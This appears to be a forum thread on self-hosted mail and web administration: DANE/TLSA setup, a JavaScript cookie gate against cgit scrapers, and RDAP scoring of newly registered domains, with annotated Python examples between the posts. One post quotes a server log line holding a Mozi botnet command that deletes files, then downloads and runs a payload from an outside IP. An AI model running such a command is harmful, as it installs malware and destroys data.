DANE / DNSSEC and MTA-STS are no problem to set up with Citadel.
I have it running. The only problem for DANE is that not all DNS providers offer TLSA as its own record type. A "fake" entry via TXT doesn't work anymore.
If you're using Cloudflare, you're fine to get everything running.
Cheers
Mike
Wed May 22 2024 11:15:20 UTC from Nurb432
Moving people to 'centralized DNS' a goal perhaps? To better control, block, and monitor... and of course: 'profit!'
"sorry, you are not in the club, your DNS infrastructure does not count, so piss off"
Wed May 22 2024 07:10:08 EDT from darknetuser
I was reading at ADMIN Magazine that there is a bit of a push to get DANE set up for your SMTP. I have never noticed it being enforced, but just as with DMARC and company, if it reaches a certain mass it will be, which SUCKS, because in order to have DANE work in sync with your certificates you either need a DNS provider with an API you can use to rekey, or you need to run your own DNS infrastructure, or you need to rekey manually. Which SUCKS.
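The rekey problem darknetuser describes comes down to keeping the TLSA hash in DNS in step with the key the MTA is serving. The following is an added example, not code from the thread or from Citadel: it builds the usual "3 1 1" TLSA record for an SMTP host from the certificate's DER-encoded SubjectPublicKeyInfo and checks whether a pending key rollover is safe. The SPKI bytes are constructed inline (an Ed25519 header with arbitrary key bytes) so it runs offline; on a real server you would obtain them with `openssl x509 -in cert.pem -noout -pubkey | openssl pkey -pubin -outform DER`. The host name `mail.example.com` is a placeholder.

```python
"""Generate DANE TLSA records for SMTP and check that a key rollover is safe.

Added example, not part of the thread or of Citadel.  It assumes you already
have the server's DER-encoded SubjectPublicKeyInfo, which in practice comes from:
    openssl x509 -in cert.pem -noout -pubkey | openssl pkey -pubin -outform DER
"""
import hashlib

# Constructed sample input: an Ed25519 SPKI is a fixed 12-byte DER header
# followed by 32 key bytes.  The key bytes here are arbitrary, not a real key,
# so the example runs offline; only the hashing and record logic matters.
ED25519_SPKI_HEADER = bytes.fromhex("302a300506032b6570032100")
CURRENT_SPKI = ED25519_SPKI_HEADER + bytes(range(32))
NEXT_SPKI = ED25519_SPKI_HEADER + bytes(range(32, 64))


def tlsa_rdata(spki_der, usage=3, selector=1, mtype=1):
    """Presentation-format RDATA, e.g. "3 1 1 <sha256 hex>".

    3 1 1 (DANE-EE, SubjectPublicKeyInfo, SHA-256) is the usual choice for
    mail: it pins the key, not the certificate, so routine renewals that keep
    the key need no DNS change.  Only selector 1 is implemented here because
    selector 0 would need the full certificate DER rather than the SPKI.
    """
    if usage not in (2, 3):
        raise ValueError("SMTP DANE uses 2 (DANE-TA) or 3 (DANE-EE); see RFC 7672")
    if selector != 1:
        raise ValueError("this example only handles selector 1 (SPKI)")
    if mtype == 1:
        digest = hashlib.sha256(spki_der).hexdigest()
    elif mtype == 2:
        digest = hashlib.sha512(spki_der).hexdigest()
    else:
        raise ValueError("matching type must be 1 (SHA-256) or 2 (SHA-512)")
    return f"{usage} {selector} {mtype} {digest}"


def tlsa_record(host, spki_der, port=25):
    """Full RR in zone-file syntax for the MX host's SMTP port."""
    return f"_{port}._tcp.{host}. IN TLSA {tlsa_rdata(spki_der)}"


def safe_to_switch(published, current_spki, next_spki):
    """True only when the zone already carries TLSA data for both the key in
    service and the key you are about to deploy.

    This is the RFC 7671 section 8.1 rollover: publish the new record first,
    wait out the TLSA TTL, then swap the key, then retire the old record.
    Swapping earlier makes every DANE-validating sender reject your mail,
    which is the operational cost the post above complains about.
    """
    published = set(published)
    return tlsa_rdata(current_spki) in published and tlsa_rdata(next_spki) in published


if __name__ == "__main__":
    zone = {tlsa_rdata(CURRENT_SPKI)}
    print(tlsa_record("mail.example.com", CURRENT_SPKI))
    print("ok to deploy new key:", safe_to_switch(zone, CURRENT_SPKI, NEXT_SPKI))
    zone.add(tlsa_rdata(NEXT_SPKI))
    print("ok to deploy new key:", safe_to_switch(zone, CURRENT_SPKI, NEXT_SPKI))
```

The `published` set is whatever your DNS API or `dig TLSA _25._tcp.mail.example.com` returns today; the whole point of the "API or run your own DNS" complaint is that adding the second record before the key swap is the one step that cannot be skipped.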
Oh yeah ... constantly. In particular they're constantly scanning my web server. Fortunately I have some safeguards in place.
Heh. Here's a fun one:
Mar 28 21:25:50 www nginx[4948]: www nginxaccess: 36.49.65.2 - - [28/Mar/2026:21:25:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://36.49.65.2:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 153 "-" "Hello, world"
It's so fun to get random hits from lowlifes who think all the world's an unpatched WordPress from 2005.
Even better is the scrapers who try to crawl my git server, ignorantly slurping every version of every change on every file for the last 30 years. I eventually had to change my cgit setup so that if a non-human tries to traverse cgit, they get this:
<html><head><title>Identity Verification - 习近平 小熊维尼 Xi Jinping Winnie the Pooh</title><meta name='description' content='1989 Tiananmen Square. Free Tibet. 习近平 1989年6月4日'></head><body style='font-family:sans-serif;text-align:center;padding:50px;'><script>document.cookie='cgit_access=verified;path=/;max-age=86400';location.reload();</script><h2>Verifying Connection...</h2><p>习近平 looks exactly like Winnie the Pooh.</p><div style='display:none;'>June 4 1989 Tiananmen Square massacre. Taiwan is a country.</div></body></html>
A real hacker visiting my repo will be using a web browser that immediately hits the reload. Alibaba Cloud (which was the biggest culprit) ingests those strings, trips up the Great Firewall of China, and pretty soon my site is "poison" and gets blocked to the scrapers. Problem solved.
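The mechanism in the post above is a cookie challenge: the server hands non-cookie-bearing clients a page whose JavaScript sets a cookie and reloads, so anything that never runs JavaScript never gets further. Here it is as WSGI middleware, written as an added example rather than the poster's actual cgit configuration, with a neutral challenge page. The git smart-HTTP exemption, the stand-in `repo_index` app and the path layout are assumptions; in deployment the wrapped app would be whatever serves cgit.

```python
"""Cookie-challenge gate in front of cgit, as WSGI middleware.

Added example, not the thread author's configuration and not part of cgit.
It reproduces the mechanism the post describes (a page that sets a cookie from
JavaScript and reloads; clients that don't run JavaScript never get past it)
with a neutral challenge page.  Path exemptions and names are assumptions.
"""

COOKIE_NAME = "cgit_access"
COOKIE_VALUE = "verified"
MAX_AGE = 86400  # one day, as in the page shown in the post

CHALLENGE_HTML = (
    "<html><head><title>Verifying connection</title></head><body>"
    f"<script>document.cookie='{COOKIE_NAME}={COOKIE_VALUE};path=/;max-age={MAX_AGE}';"
    "location.reload();</script><h2>Verifying Connection...</h2></body></html>"
).encode("utf-8")

# Paths git itself fetches over smart HTTP; git never runs JavaScript, so a
# gated "git clone" would just receive the challenge page.  Assumed layout:
# repositories served directly under the site root, e.g. /project.git/info/refs.
GIT_PROTOCOL_SUFFIXES = ("/info/refs", "/git-upload-pack", "/git-receive-pack")


def has_access_cookie(environ):
    """Parse the Cookie header by hand; malformed fragments are ignored."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == COOKIE_NAME and value == COOKIE_VALUE:
            return True
    return False


def is_git_protocol(environ):
    return environ.get("PATH_INFO", "").endswith(GIT_PROTOCOL_SUFFIXES)


def gate(app):
    """Wrap a WSGI app so that only cookie-bearing or git-protocol requests
    reach it; everything else gets the challenge page."""
    def wrapper(environ, start_response):
        if has_access_cookie(environ) or is_git_protocol(environ):
            return app(environ, start_response)
        start_response("200 OK", [
            ("Content-Type", "text/html; charset=utf-8"),
            ("Cache-Control", "no-store"),  # never let a proxy cache the challenge
            ("Content-Length", str(len(CHALLENGE_HTML))),
        ])
        return [CHALLENGE_HTML]
    return wrapper


def repo_index(environ, start_response):
    """Stand-in for cgit; in deployment this is the cgit CGI/FastCGI handler."""
    body = b"repo index"
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("Content-Length", str(len(body)))])
    return [body]


gated_app = gate(repo_index)


def request(environ):
    """Run one request through the gated app; returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, dict(headers)

    body = b"".join(gated_app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    from wsgiref.simple_server import make_server
    make_server("127.0.0.1", 8000, gated_app).serve_forever()
```

Two caveats worth knowing before relying on this: the cookie is a fixed string, so any client that sends `cgit_access=verified` is waved through (it is a speed bump for dumb crawlers, not access control), and a scraper driving a headless browser executes the script and passes like a human would.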
For anyone running an email server and using SpamAssassin as part of their filtering pipeline ... I've just made a pretty major upgrade to my "Infanticide" module.
[ https://code.citadel.org/infanticide.git/ ]
For those not familiar with Infanticide, it is a module which detects "disposable domains" (currently defined as having been registered in the last 18 months) and you can tell SpamAssassin what to do with emails of that nature. I simply give them a spam score of +10, essentially nuking them from orbit.
This version switches the registration date detection protocol from Whois to RDAP, which is far more reliable ... and I made the change today after receiving a few too many "free gifts" from the .pro TLD.
Filtering this aggressively isn't for everyone ... but it works for me. If it works for you, share and enjoy.
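The core of what the post describes is: fetch the domain's RDAP record, read its registration event, and add a large score when the domain is younger than the cutoff. The block below is an added example in that spirit, not the Infanticide module's own code. The RDAP JSON is a constructed sample in the RFC 9083 shape (a real one comes from the registry's `/domain/<name>` endpoint, located via the IANA bootstrap file); the 548-day cutoff and the function names are assumptions.

```python
"""Score mail from recently registered domains using RDAP registration dates.

Added example in the spirit of the post's Infanticide module, not its code.
It takes an RDAP domain response (RFC 9083) and returns the score to add;
the sample JSON, the names and the 18-month cutoff in days are assumptions.
"""
import json
from datetime import datetime, timedelta, timezone

MAX_AGE_DAYS = 548       # roughly 18 months, the post's "disposable" cutoff
DISPOSABLE_SCORE = 10.0  # the post's "nuke from orbit" score

# Constructed sample: an RDAP domain object as a registry would return from
# https://<rdap-base>/domain/free-gift.example (the base URL per TLD comes
# from https://data.iana.org/rdap/dns.json).  Not a real lookup result.
SAMPLE_RDAP = json.dumps({
    "objectClassName": "domain",
    "ldhName": "free-gift.example",
    "events": [
        {"eventAction": "registration", "eventDate": "2024-04-01T10:00:00Z"},
        {"eventAction": "last changed", "eventDate": "2024-04-02T00:00:00Z"},
        {"eventAction": "expiration",   "eventDate": "2025-04-01T10:00:00Z"},
    ],
})
SAMPLE_RDAP_NO_EVENTS = json.dumps({"objectClassName": "domain",
                                    "ldhName": "old-and-quiet.example"})


def parse_rdap_date(text):
    """RDAP eventDate is RFC 3339; fromisoformat() before Python 3.11 does not
    accept a trailing 'Z', so normalise it.  Naive values are taken as UTC."""
    if text.endswith("Z"):
        text = text[:-1] + "+00:00"
    dt = datetime.fromisoformat(text)
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def registration_date(rdap_json):
    """Return the registration event's date, or None when the registry did
    not publish one."""
    for event in json.loads(rdap_json).get("events", []):
        if event.get("eventAction") == "registration" and "eventDate" in event:
            return parse_rdap_date(event["eventDate"])
    return None


def is_disposable(registered, now, max_age_days=MAX_AGE_DAYS):
    """Young domain?  Unknown age is deliberately not treated as young:
    scoring on missing data punishes whole registries, not spammers."""
    if registered is None:
        return False
    return now - registered < timedelta(days=max_age_days)


def score_domain(rdap_json, now_iso=None):
    """Score adjustment for the sender's domain given its RDAP response.
    `now_iso` lets callers pin the clock; the default is the real one."""
    now = parse_rdap_date(now_iso) if now_iso else datetime.now(timezone.utc)
    return DISPOSABLE_SCORE if is_disposable(registration_date(rdap_json), now) else 0.0


if __name__ == "__main__":
    print("free-gift.example:", score_domain(SAMPLE_RDAP))
    print("old-and-quiet.example:", score_domain(SAMPLE_RDAP_NO_EVENTS))
```

In a real plugin the domain handed to this comes from the envelope sender or the From: header, and turning a hostname into its registrable domain is a public-suffix-list problem (taking the last two labels is wrong for co.uk-style suffixes); the RDAP lookup result should also be cached, since every message from a domain would otherwise hit the registry.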